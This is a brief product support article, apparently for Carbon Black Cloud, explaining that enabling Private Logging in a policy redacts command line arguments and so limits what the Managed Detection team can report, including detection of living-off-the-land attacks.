Environment
- CBC Web Console: All Versions
- Managed Detection
Question
Does enabling Private Logging in a CBC policy cause the alerts sent from the Managed Detection team to contain less information?
Answer
Enabling Private Logging within a policy can prevent the Managed Detection team from sending much of the useful information obtained from an alert - thereby limiting the scope of the Manage Detection alerts.
Additional Notes
- The most important IOC being considered by the Managed Detection team is typically the command line argument, which is redacted if Private Logging is enabled.
- Enabling Private Logging can prevent the Managed Detection team from identifying "living off the land" attacks.
Related Content